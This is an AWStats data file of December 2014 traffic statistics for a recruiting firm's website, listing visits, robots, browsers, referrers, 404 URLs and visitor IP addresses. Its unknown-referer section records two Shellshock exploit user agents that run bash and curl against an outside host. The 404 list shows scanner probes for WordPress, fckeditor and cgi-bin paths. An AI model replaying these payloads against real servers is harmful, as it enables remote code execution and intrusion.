AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201412 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2535                
POS_VISITOR 16407               
POS_DAY 44030               
POS_DOMAIN 3431                
POS_LOGIN 3664                
POS_ROBOT 3819                
POS_WORMS 4931                
POS_EMAILSENDER 5062                
POS_EMAILRECEIVER 5205                
POS_SESSION 44892               
POS_SIDER 45102               
POS_FILETYPES 5340                
POS_OS 5523                
POS_BROWSER 5693                
POS_SCREENSIZE 6645                
POS_UNKNOWNREFERER 6719                
POS_UNKNOWNREFERERBROWSER 9421                
POS_ORIGIN 9968                
POS_SEREFERRALS 10118               
POS_PAGEREFS 10314               
POS_SEARCHWORDS 12686               
POS_KEYWORDS 13077               
POS_MISC 2199                
POS_ERRORS 13376               
POS_CLUSTER 3520                
POS_SIDER_404 13511               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20150101000902 4 274 44633557208
FirstTime 20141201005208
LastTime 20141231222547
LastUpdate 20150101020247 4 0 0 2 1
TotalVisits 831                 
TotalUnique 685                 
MonthHostsKnown 0                   
MonthHostsUnknown 713                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 9 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 40 155 728167 189 207 698184
1 59 177 774465 248 287 776379
2 54 156 838400 238 269 720286
3 62 182 887847 176 195 854690
4 57 247 1300392 199 210 1064360
5 23 92 474716 140 149 628751
6 77 219 1298674 154 162 538729
7 45 131 754871 170 183 755827
8 42 124 595972 189 224 900982
9 360 565 2949737 207 221 903205
10 66 264 1626202 151 169 532249
11 99 353 1795377 178 192 518557
12 80 291 1466869 152 166 497257
13 90 303 1969108 160 190 622498
14 40 201 1253757 255 310 1483001
15 81 249 1577360 138 144 649900
16 315 490 2160070 161 208 874083
17 50 130 705646 160 166 550155
18 26 85 445304 171 183 731383
19 26 98 565813 148 178 756569
20 33 131 748838 183 203 909390
21 40 105 493525 136 149 424746
22 48 135 611807 186 202 743501
23 35 107 538533 172 182 596704
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1848 4990 26561450
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 27
googlebot 1408 4131577 20141231234418 101
\wbot[\/\-] 913 4150694 20141231220635 146
yandex 341 1137628 20141231224934 107
mj12bot 300 522230 20141231184619 137
crawl 271 1202036 20141231104035 6
baiduspider 261 2403588 20141231172330 14
robot 233 797532 20141231201116 52
spider 176 259697 20141231213900 80
nutch 158 683637 20141231040204 58
phantom 111 501372 20141230090055 0
exabot 43 76517 20141230141216 20
ia_archiver 1 1288 20141205143826 0
mojeekbot 13 33529 20141227035630 5
seznambot 28 76040 20141229124107 10
universalfeedparser 1 1307 20141204205040 0
ng\/1\. 1 1288 20141212162551 0
unknown 46 42519 20141231133738 46
slurp 75 418869 20141229161959 24
checkbot 1 108005 20141211043159 0
python 13 21769 20141230032057 2
titan 4 5152 20141229072754 0
surveybot 8 8872 20141225224332 4
java 32 213733 20141231183235 0
archive\.org_bot 14 37406 20141226075114 8
turnitinbot 51 228845 20141231125839 2
linkbot 1 1288 20141204111317 0
netcraft 2 2614 20141210083355 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 405 3898036 0 0
asp 1839 5388322 0 0
bmp 8 196848 0 0
js 435 1645408 0 0
jpg 2050 13815758 0 0
pdf 9 971912 0 0
gif 244 645166 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 12
winxp 263
winlong 20
unix 12
winnt 3012
win2000 2
win98 1
linuxubuntu 2
linux 834
macosx 334
win2003 40
linuxcentos 2
Unknown 468
END_OS

# Browser ID - Hits
BEGIN_BROWSER 67
msie6.0 23
firefox28.0 16
firefox3.6 1
firefox2.0.0.1 1
firefox4.0 4
firefox18.0 2
firefox34.0 189
curl 2
lynx 2
ecatch 1
firefox3.6.15 14
firefox2.0.0.13 1
msie8.0 106
msie7.0 45
firefox23.0 9
firefox9.0.1 16
wget 1
netscape 1
firefox3.0 2
firefox21.0 19
firefox29.0 65
firefox7.0.1 1
firefox12.0 4
msie5.00 1
firefox33.0 87
mozilla 225
firefox25.0 4
netscape5.0 5
firefox14.0.1 20
netscape4.0 2
firefox3.6.3 2
firefox3.6.22 1
firefox10.0.2 2
firefox8.0.1 2
safari 3127
firefox35.0 44
firefox5.0 13
firefox3.0.7 1
firefox20.0 9
firefox4.0.1 7
up\. 1
firefox24.0 2
firefox3.5.3 1
firefox31.0 249
msie9.0 109
firefox3.6.10 1
Unknown 183
firefox27.0 1
firefox32.0 48
firefox3.5.6 1
firefox17.0 1
opera 231
libwww 2
firefox3.6.16 1
msie5.5 3
firefox30.0 2
firefox3.0.5 1
firefox3.0.3 1
firefox1.0 2
firefox3.0.6 2
firefox22.0 1
firefox5.0.1 1
msie10.0 58
firefox6.0 3
firefox3.0.13 2
msie 5
firefox3.5 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 39
Mozilla/5.0_(compatible;_DuckDuckGo-Favicons-Bot/1.0;__http://duckduckgo.com) 20141231142303
Mozilla/5.0_(compatible;_MSIE_10.0;_Windows_Phone_8.0;_Trident/6.0;_IEMobile/10.0;_ARM;_Touch;_NOKIA;_Lumia_929) 20141204154719
SEOstats_2.1.0____________https://github.com/eyecatchup/SEOstats 20141231181821
Xenu_Link_Sleuth/1.3.8 20141225074016
Mozilla/5.0_(compatible;_MSIE_10.0;_Windows_Phone_8.0;_Trident/6.0;_IEMobile/10.0;_ARM;_Touch;_NOKIA;_Lumia_520)_UCBrowser/4.1.0.504_Mobile 20141215073504
Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.6368;_U;_en)_Presto/2.8.119_Version/11.10 20141224005628
libwww-perl/5.805 20141202032841
Opera/9.80_(Android;_Opera_Mini/7.5.35613/35.6368;_U;_en)_Presto/2.8.119_Version/11.10 20141230045806
Opera/9.80_(Android;_Opera_Mini/7.5.33361/35.6172;_U;_en)_Presto/2.8.119_Version/11.10 20141215003243
Owler 20141231161911
aboutthedomain 20141203222350
Opera/9.80_(Android;_Opera_Mini/7.5.35721/35.6172;_U;_en)_Presto/2.8.119_Version/11.10 20141215141530
Mozilla/4.0_(compatible;_Synapse) 20141207203733
Mozilla 20141213195318
Lynx/2.8.5rel.1_libwww-FM/2.15FC_SSL-MM/1.4.1c_OpenSSL/0.9.7e-dev 20141219174210
Riddler_(http://riddler.io/about) 20141208131021
Mozilla/4.0 20141202054343
Mozilla/5.0_(compatible;_pmoz.info_ODP_link_checker;__http://pmoz.info/doc/botinfo.htm) 20141226223328
Mozilla/5.0 20141217085750
Mozilla/5.0_(compatible;_Owler/0.4;__;_) 20141204064358
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141223133920
Scrapy/0.24.4_(_http://scrapy.org) 20141202175525
NerdyBot 20141231122602
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=thencsgroup.com/' 20141213111437
Mozilla/5.0_(compatible;_coccoc/1.0;__http://help.coccoc.com/) 20141208080936
PHP/5.4.24 20141205084720
Mozilla/5.0_(compatible;_MSIE_or_Firefox_mutant;_not_on_Windows_server;___http://tab.search.daum.net/aboutWebSearch.html)_Daumoa/3.0 20141226072537
- 20141231220322
M 20141203152518
Wget/1.9_cvs-stable_(Red_Hat_modified) 20141205103956
FindTheBest.com-URL-Validator 20141230032058
Mozilla/3.0_(compatible;_Indy_Library) 20141210203834
Opera/9.80_(Android;_Opera_Mini/6.1.25577/35.6368;_U;_en)_Presto/2.8.119_Version/11.10 20141227124412
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=ncsjobs.com/' 20141215164202
Opera/9.80_(Android;_Opera_Mini/7.6.40125/35.6368;_U;_en)_Presto/2.8.119_Version/11.10 20141225045603
Mozilla/5.0_(compatible;_wmtips.com/1.0;__http://www.wmtips.com/tools/) 20141223035450
DomainWho.is/1.0 20141221014028
Mozilla/5.0_(compatible;_Prlog/1.0;__http://prlog.ru/) 20141231133738
A6-Indexer 20141209132312
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 13
PHP/5.4.24 20141205084720
Xenu_Link_Sleuth/1.3.8 20141225074016
Riddler_(http://riddler.io/about) 20141208131021
- 20141231220322
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141223133920
M 20141203152518
Owler 20141231161911
aboutthedomain 20141203222350
DomainWho.is/1.0 20141221014028
Scrapy/0.24.4_(_http://scrapy.org) 20141202175525
NerdyBot 20141231122602
FindTheBest.com-URL-Validator 20141230032058
A6-Indexer 20141209132312
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 1106 1116
From1 1 1
From2 109 118
From3 459 1879
From4 173 1876
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 5
google 88 97
search 5 5
baidu 9 9
ask 1 1
yahoo 6 6
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 55
http://semalt.semalt.com/crawler.php 111 111
http://buttons-for-website.com 71 71
http://www.ncsjobs.com 45 281
http://ncsjobs.com 39 719
http://make-money-online.7makemoneyonline.com/money.php 27 27
http://www.yellowpages.com/about/legal/crawl 21 21
http://www.ncsjobs.com/consultants.asp 19 52
http://www.ncsjobs.com/home.asp 17 149
http://www.ncsjobs.com/company.asp 10 57
http://ncsjobs.com/consultants.asp 9 15
http://www.ncsjobs.com/aboutUs.asp 6 21
http://medispainstitute.com.au/areas-of-concern/volume-restoration/ 1 1
http://www.career2.com 1 1
http://www.ncsjobs.com/cs104a.asp 0 1
http://www.ncsjobs.com/careerResources.asp 2 23
http://www.ncsjobs.com/caseStudies.asp 2 4
http://www.ncsjobs.com/projectServices.asp 1 10
http://l.facebook.com/lsr.php 2 2
http://ncsjobs.com/caseStudies.asp 3 3
http://privhosting.com 2 2
http://l.facebook.com/l.php 2 2
http://www.zoominfo.com/s/ 0 1
http://ncsjobs.com/careerResources.asp 6 8
http://www.ncsjobs.com/webStyles.css 0 81
http://www.ncsjobs.com/testimonials.asp 0 1
http://www.ncsjobs.com/services.asp 4 24
http://ncsjobs.com/contactUs.asp 4 7
http://lm.facebook.com/l.php 3 3
http://ncsjobs.com/testimonials.asp 2 2
http://www.bing.com/search 3 3
http://www.ncsjobs.com/registerApply.asp 2 2
http://ncsjobs.com/jobSearch.asp 0 15
http://www.nominet.org.uk/privacypolicy 2 2
http://ncsjobs.com/company.asp 6 22
http://www.ncsjobs.com/docs/RJCM_A_157849.pdf 1 1
http://www.so.com/s 1 1
http://www.ncsjobs.com/index.asp 1 1
http://www.ncsjobs.com/jobSearch.asp 0 1
http://subscriber.hoovers.com/H/company360/overview.html 2 2
http://brokenlinklookup.com/result.php 2 2
http://7makemoneyonline.com 1 1
http://ncsjobs.com/services.asp 2 6
http://www.ncsjobs.com/history.asp 3 10
http://ncsjobs.com/webStyles.css 0 39
http://ncsjobs.com/scripts.js 0 2
http://ncsjobs.com/home.asp 2 18
http://www.ncsjobs.com/contactUs.asp 6 14
http://www.ncsjobs.com/clients.asp 3 11
http://www.ncsjobs.com/staffing.asp 0 1
http://ncsjobs.com/aboutUs.asp 2 7
http://prlog.ru/analysis/thencsgroup.com 2 2
http://www.recruiterresources.com/XcDirectory/XcDirViewInCat.asp 1 1
http://ncsjobs.com/projectServices.asp 5 9
http://www.ncsjobs.com/news.asp 1 4
http://ncsjobs.com/clients.asp 1 2
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 9
ncs+group 3
telephone+interview+research+golden+rules 2
ncs+interview+questions+for+oracle+developer 1
national+computer+service 1
the+ncs+group+job+board 1
ncs+staffing 1
ncojobs.com 1
managing+business+transformation 1
thencsgroup.com 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 23
ncs 6
group 4
interview 3
telephone 2
golden 2
research 2
rules 2
the 1
managing 1
ncojobs.com 1
national 1
developer 1
business 1
for 1
staffing 1
board 1
questions 1
oracle 1
service 1
transformation 1
job 1
computer 1
thencsgroup.com 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
403 2 356
302 4 1720
206 8 267213
406 3 5691
404 226 387374
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 99
/sitemap.xml 9 -
/apple-touch-icon-57x57.png 1 -
/archive/archive.css 1 -
/contactus 2 -
/user 1 -
/feed.asp 1 -
/admin.php 9 -
/wp-content/uploads/wpdata.php 1 -
/feed/ 1 -
/wordpress/wp-login.php 4 -
/licence.txt 1 -
/common/common.js 1 -
/rss.xml 1 -
/index.xml 1 -
/wp-admin/ 2 -
/changelog.txt 2 -
/services.asp/contactus.asp 1 http://thencsgroup.com/services.asp
/admin/wp-login.php 4 -
/browserconfig.xml 4 -
/rss/ 1 -
/member/space/company/info.txt 1 -
/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/editor/editor/filemanager/connectors/test.html 1 -
/+newlink1+ 1 -
/+newlink3+ 1 -
/list.php 1 -
/wp-content 1 -
/index.rss 1 -
/administrator/manifests/files/joomla.xml 1 -
/apple-touch-icon-114x114.png 1 -
/c:/inetpub/wwwroot/library/insurance/insurance102cs-projectmanagement.doc 2 -
/apple-touch-icon-76x76.png 1 -
/plus/rssmap.html 1 -
/tiki-articles_rss.php 1 -
/admin/fckeditor/editor/filemanager/connectors/test.html 1 -
/feed.rss 1 -
/apple-touch-icon-120x120.png 1 -
/cgi-sys/entropysearch.cgi 2 -
/inc/templates/rss.xslt 1 -
/apple-touch-icon-152x152.png 1 -
/administrator/ 6 -
/blog/wp-admin/ 2 -
/editor/editor/filemanager/browser/default/connectors/test.html 1 -
/blog/wp-login.php 7 -
/node/feed 1 -
/wp-login.php 19 -
/admin/inc/xml.xslt 1 -
/inc/rsd.php 1 -
/consultant.asp 33 http://www.ncsjobs.com/goldenRules.asp
/site/wp-login.php 4 -
/test/wp-admin/ 2 -
/cgi-bin/php.cgi 1 -
/wp/wp-admin/ 2 -
/rss.php 3 -
/wp-includes/css/admin-bar.css 1 https://www.google.com/
/wp-content/plugins/revslider/release_log.txt 1 -
/components/com_community/index.html 1 -
/apple-touch-icon.png 2 -
/cgi-bin/php 1 -
/feed.php 1 -
/postings/1775 1 -
/wp-login/ 4 -
/old/wp-admin/ 1 -
/data/admin/ver.txt 1 -
/cgi-bin/php5 1 -
/data 1 -
/cgi-bin/php4 1 -
/fckeditor/editor/filemanager/connectors/test.html 1 -
/feed.xml 1 -
/wp-admin/admin-ajax.php 5 -
/license.txt 1 -
/digg.php 1 -
/archiver 1 -
/clientscript/vbulletin_ajax_htmlloader.js 1 -
/admin/template/article_more/config.htm 1 -
/cgi-bin/php-cgi 1 -
/wp/wp-login.php 4 -
/history.txt 1 -
/section/wp-login.php 4 -
/apple-touch-icon-precomposed.png 1 -
/cgi-bin/sys.cgi 3 -
/user/ 1 -
/administrator/index.php 7 -
/plus/sitemap.html 1 -
/feeds/ 1 -
/readme.html 1 -
/admin 1 -
/wordpress/wp-admin/ 2 -
/wp-cron.php 1 -
/help.aspx 1 -
/extern.php 1 -
/plus/heightsearch.php 1 -
/apple-touch-icon-144x144.png 1 -
/postings/1771 2 -
/index.php 5 -
/tools/rss.aspx 1 -
/public/js/ips.board.js 1 -
/cgi-bin/main.cgi 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 713
54.85.116.12 77 77 319962 20141209163923
54.173.91.37 76 76 407904 20141209163923
54.172.160.157 69 69 250981 20141209163924
54.173.186.245 49 49 193596 20141209163921
54.165.180.247 47 47 196685 20141209095053
54.173.182.11 46 46 183324 20141209163924
54.172.50.71 42 42 175851 20141209095054
54.173.188.13 39 39 151683 20141209152533
54.85.160.208 39 39 147956 20141209095053
54.173.13.226 36 36 140207 20141209163924
117.213.163.250 1 6 42200 20141223234756
103.252.200.97 3 12 53265 20141228080533
69.58.178.56 10 10 38321 20141212075440
177.138.164.247 1 7 42768 20141224154014
80.174.52.23 1 3 14926 20141210054958
106.120.160.119 1 2 5170 20141226150232
130.211.161.211 1 1 1312 20141204111952
69.197.16.95 1 1 1307 20141217194044
199.30.24.13 0 3 6251 
118.238.220.238 1 1 1288 20141225035240
216.224.173.163 1 1 1288 20141216055604
217.69.133.169 2 2 2576 20141223043024
131.216.144.200 2 14 85536 20141230125728
191.243.113.216 1 7 42768 20141203081923
177.106.181.25 1 7 42768 20141222200656
107.167.107.246 2 14 70934 20141230015112
187.53.93.32 1 7 42768 20141223141744
69.251.241.31 3 16 87370 20141209111917
72.107.125.83 2 17 95351 20141224125222
177.235.123.88 1 7 42768 20141215083733
220.181.108.116 1 1 3479 20141206224305
186.226.248.10 1 7 42768 20141229171010
69.195.79.127 1 1 1288 20141222094316
95.211.134.37 1 1 1288 20141212183226
166.121.37.11 3 11 62792 20141202030303
54.147.49.25 1 1 1288 20141208061509
200.140.244.169 1 7 42768 20141213201745
177.80.143.30 1 7 42768 20141215172029
189.91.128.124 1 4 6462 20141220143401
141.0.11.5 1 7 42768 20141225015519
216.227.214.143 1 1 1288 20141222032910
198.211.105.73 6 7 24599 20141226085545
213.248.211.174 2 2 1551 20141204082715
37.210.131.0 1 1 1288 20141209012754
201.89.75.73 1 7 42768 20141231155339
187.39.91.237 1 7 42768 20141210094033
64.237.239.100 1 7 42768 20141218180650
123.125.71.106 1 1 1307 20141209014841
189.110.126.149 1 7 42768 20141205043903
179.176.164.125 1 7 42768 20141206231331
221.127.9.1 1 7 42768 20141228102417
130.211.141.59 1 1 1312 20141204122826
198.211.104.25 6 7 24599 20141208042028
23.239.209.225 1 1 1307 20141204175239
50.192.51.2 3 16 69814 20141206111228
54.90.34.77 1 1 1288 20141226201859
69.162.142.104 1 1 4047 20141206063843
187.10.185.149 1 7 42768 20141209124326
207.172.186.71 4 4 976 20141226223328
200.185.219.245 1 7 42768 20141202121913
62.210.124.165 1 1 1288 20141207164937
188.39.139.170 2 17 95351 20141216104732
177.98.55.167 1 4 6462 20141230164007
85.30.81.6 9 37 249318 20141220130805
179.181.200.26 1 7 42768 20141231161655
117.203.167.25 1 7 42768 20141219061019
179.52.231.125 1 7 42768 20141216165125
46.12.3.194 1 7 42768 20141230022520
177.185.191.2 1 7 42768 20141229162940
189.83.116.216 1 7 42768 20141214133818
141.135.62.85 1 7 42768 20141225144440
217.66.166.199 1 7 42768 20141230164234
95.160.19.111 1 1 1307 20141219033401
80.67.17.163 2 2 2614 20141216062011
91.200.13.64 1 1 1288 20141224115915
187.10.194.171 1 7 42768 20141218103645
195.154.235.55 2 2 2576 20141225000515
192.122.131.37 11 26 181183 20141228210603
177.47.248.43 1 7 42768 20141219071907
146.148.66.1 1 1 1312 20141213122830
182.118.44.38 1 3 14926 20141208105731
218.30.116.93 0 1 3863 
91.121.146.212 1 1 1288 20141221014028
112.64.235.251 1 2 5170 20141202053316
213.133.97.216 3 3 1833 20141218204421
120.151.20.231 4 18 105849 20141201232256
173.234.37.89 1 1 4241 20141206063845
84.125.140.87 1 7 42768 20141217095332
23.251.145.28 1 1 1312 20141218111956
191.33.5.218 1 7 42768 20141217152413
23.90.246.199 1 1 1307 20141205142757
216.172.56.37 2 2 2576 20141213080128
208.93.104.7 10 10 4528 20141231015610
210.199.227.18 1 1 1312 20141225083626
93.40.126.157 1 7 42768 20141228023551
54.91.197.136 2 2 488 20141215212133
72.46.136.178 4 4 5152 20141229222124
54.145.21.183 1 1 1288 20141209141459
2.223.201.103 1 7 42768 20141229175717
116.87.181.176 1 10 43198 20141203222121
130.211.164.79 1 1 1312 20141228111841
146.148.88.45 1 1 1312 20141213112017
130.211.136.192 1 1 1312 20141205123000
82.145.211.34 2 9 34954 20141225035537
54.183.28.108 1 1 244 20141231161911
46.4.17.22 1 1 244 20141231181821
41.215.254.69 1 1 1288 20141225033100
152.226.7.211 1 10 43198 20141215211519
130.211.152.67 1 1 1312 20141219122811
177.103.56.153 1 7 42768 20141204125354
130.211.143.116 1 1 1312 20141226122649
38.100.21.68 9 10 44333 20141210171938
108.68.132.172 3 21 85947 20141210112351
187.84.171.40 1 7 42768 20141223081609
165.123.243.167 3 16 87370 20141219120357
168.235.1.4 1 13 67050 20141205132838
79.26.107.23 1 7 42768 20141228064020
54.72.62.100 2 2 2576 20141203193603
220.255.1.45 0 1 3844 
99.249.70.54 1 7 42768 20141228050554
79.44.122.98 1 7 42768 20141203135849
211.244.83.248 1 1 1288 20141204110336
198.199.66.108 6 7 24599 20141214025228
216.110.210.222 7 20 125466 20141212175442
213.66.198.15 1 7 42768 20141224131608
182.19.175.105 2 20 86396 20141219015636
84.90.106.163 1 7 42768 20141214181135
37.228.105.167 16 46 305626 20141230022430
179.126.3.181 1 7 42768 20141218133818
179.183.144.141 1 7 42768 20141206160028
24.34.161.121 1 1 1288 20141201231501
179.111.102.24 1 7 42768 20141211195331
41.77.221.93 2 8 43989 20141225030055
186.137.83.39 1 7 42768 20141207155939
89.142.230.219 1 7 42768 20141228135412
106.120.160.109 0 1 3863 
198.211.104.210 6 7 24599 20141203175446
92.40.248.191 1 10 43198 20141217145200
105.225.231.77 1 7 42768 20141226102618
41.160.146.189 1 7 42768 20141219025242
203.186.208.246 1 7 42768 20141201074739
85.61.225.245 1 7 42768 20141214094129
54.164.75.128 1 1 1288 20141204165652
109.205.246.90 2 2 488 20141231031918
37.130.226.90 3 3 3864 20141231222547
146.115.5.242 1 7 42768 20141215134513
173.234.59.32 0 1 3844 
130.211.160.172 1 1 1312 20141201112141
130.211.139.136 1 1 1312 20141223122659
78.158.11.226 2 2 4918 20141219174210
177.96.215.190 1 7 42768 20141228072054
191.177.252.233 1 7 42768 20141205195208
188.218.219.220 1 7 42768 20141226121559
177.235.126.221 1 7 42768 20141208104436
189.46.9.146 1 7 42768 20141209181047
107.23.45.196 1 1 1288 20141231142303
216.150.189.2 7 67 136947 20141228160321
182.118.44.247 1 3 14926 20141228042413
54.176.139.126 6 6 20755 20141209204558
187.10.98.188 1 7 42768 20141208192053
146.148.56.227 1 1 1312 20141215112020
185.2.144.172 1 7 42768 20141209090621
209.128.92.220 12 12 27192 20141231151406
203.92.77.146 1 7 42768 20141228205417
189.41.245.222 1 7 42768 20141205093735
220.255.1.161 0 1 2780 
222.134.87.102 3 20 159546 20141222202141
190.3.230.169 1 7 42768 20141222110851
54.82.118.60 1 1 1288 20141203222739
180.153.198.73 1 3 14926 20141226145246
27.153.251.209 2 2 2576 20141202114456
69.197.222.235 3 19 110031 20141208210741
14.100.132.93 1 10 43198 20141202204951
174.143.89.144 1 1 244 20141205145149
146.148.90.22 1 1 1312 20141216122953
2.234.110.106 1 7 42768 20141218080002
179.213.119.249 1 7 42768 20141227164042
177.134.170.252 1 7 42768 20141204140006
185.72.244.38 2 2 488 20141220153539
54.154.73.19 1 1 1288 20141222101106
166.137.14.75 9 13 84490 20141212093311
94.153.51.223 1 1 1288 20141210203834
107.153.85.34 1 1 1288 20141212221944
186.194.21.102 1 7 42768 20141223165301
183.57.154.64 1 1 1288 20141211131917
54.173.242.186 35 35 243862 20141209163921
68.71.158.208 1 1 3479 20141206063844
159.224.139.133 2 2 2576 20141223073923
77.54.123.37 1 7 42768 20141223051401
103.244.144.235 2 17 95351 20141220001212
61.135.190.103 3 8 23084 20141218111351
67.252.116.174 2 17 95351 20141216133540
187.13.43.111 1 7 42768 20141216174540
204.236.214.76 6 6 1464 20141216024550
46.235.65.149 1 1 3403 20141229091758
201.74.88.134 1 7 42768 20141203143015
115.66.49.54 1 10 43198 20141210225736
173.215.129.128 1 7 42768 20141220145610
79.103.166.32 1 7 42768 20141230164808
146.148.54.217 1 1 1312 20141208112103
174.53.10.81 6 23 133151 20141228231242
199.30.24.20 0 3 27080 
130.211.151.31 1 1 1312 20141229111906
14.141.36.210 1 7 42768 20141203055947
208.79.15.146 4 31 166295 20141220064458
179.213.211.183 1 7 42768 20141212145810
88.13.214.37 1 7 42768 20141210012652
187.28.223.30 1 7 42768 20141223153359
204.14.86.108 1 1 244 20141206104543
208.117.14.1 1 1 5638 20141206182513
103.3.72.58 1 10 43198 20141208231404
186.23.198.191 1 7 42768 20141205195325
176.102.38.36 2 2 526 20141215164202
50.242.133.129 3 16 86072 20141209121639
81.193.72.18 1 7 42768 20141223145248
173.255.113.156 1 1 1312 20141207120600
212.159.73.13 1 1 1288 20141222024630
199.30.25.79 0 2 13090 
208.93.104.9 2 2 488 20141207011236
24.196.237.49 3 16 85614 20141203100747
72.184.200.69 2 2 2576 20141228051926
54.154.0.43 2 2 2576 20141201184041
103.3.23.133 1 7 42768 20141229032844
167.114.100.169 3 3 3864 20141228024514
49.151.48.114 1 7 42768 20141204100414
179.178.235.113 1 7 42768 20141221095941
182.64.100.164 1 1 1288 20141224030801
5.9.11.122 1 1 1288 20141207045400
187.12.150.46 1 7 42768 20141201115852
134.126.236.71 1 7 42768 20141205094038
23.253.160.244 1 1 1288 20141217085750
109.203.26.155 1 7 42768 20141227164752
197.248.81.94 3 16 87950 20141221031836
23.239.209.206 1 1 4676 20141206110418
167.56.93.159 1 7 42768 20141222211841
125.60.156.150 1 7 42768 20141222214350
191.240.131.134 1 7 42768 20141224114456
182.118.54.17 1 3 14926 20141211215602
187.15.25.10 1 7 42768 20141210095800
179.186.203.45 1 7 42768 20141229053929
217.6.201.31 2 14 70934 20141204074446
198.204.253.99 1 1 1288 20141207052809
50.62.58.57 1 1 1288 20141201232334
182.118.44.218 1 3 14926 20141203235506
166.137.12.130 5 19 105765 20141212092408
178.51.196.236 1 7 42768 20141227162826
54.77.126.143 2 2 2576 20141203230538
173.254.213.107 1 1 8651 20141206182521
59.93.127.94 3 16 89413 20141227102244
105.236.250.142 1 7 42768 20141209022100
93.173.245.253 1 1 244 20141209013028
120.37.209.242 1 1 1288 20141216060257
62.210.82.148 1 1 1288 20141225065845
199.30.16.183 0 3 6251 
96.5.137.209 1 6 42208 20141212115628
38.100.21.64 9 10 41452 20141220123451
187.1.238.218 1 7 42768 20141228154023
201.86.161.5 1 7 42768 20141224143822
117.169.1.120 1 1 107986 20141216132843
205.166.61.229 4 21 130266 20141208153911
203.153.223.112 1 7 42768 20141227124853
107.178.222.33 1 1 1312 20141209122934
130.211.48.166 2 2 2614 20141220213614
89.69.56.179 1 1 1288 20141222135327
176.106.1.193 3 19 108692 20141231040927
130.211.178.226 1 1 1312 20141223111811
179.213.161.124 1 7 42768 20141201104222
191.180.84.127 1 7 42768 20141206075910
189.84.164.146 1 7 42768 20141217192240
191.205.166.90 1 7 42768 20141231005425
189.40.88.241 1 6 42200 20141221195443
186.195.141.4 0 3 36306 
173.234.165.92 1 1 4165 20141206104547
177.1.88.33 1 7 42768 20141215070241
88.16.24.107 1 7 42768 20141222110120
58.182.193.17 1 10 43198 20141226121103
191.208.125.162 1 3 14926 20141224165038
68.71.139.203 1 1 5150 20141206110416
177.65.54.144 1 7 42768 20141223071934
61.135.190.102 1 2 5132 20141217033106
116.231.126.239 1 1 1288 20141216122338
49.205.97.218 3 16 85614 20141203111827
94.201.232.51 3 16 87950 20141217120732
146.148.59.236 1 1 1312 20141212112100
174.126.221.93 1 11 90270 20141218171248
199.30.24.111 0 5 31686 
14.100.134.74 1 10 43198 20141230120011
208.90.57.196 7 7 23565 20141214113202
182.118.44.27 1 3 14926 20141217035519
89.136.164.118 1 10 44934 20141208161847
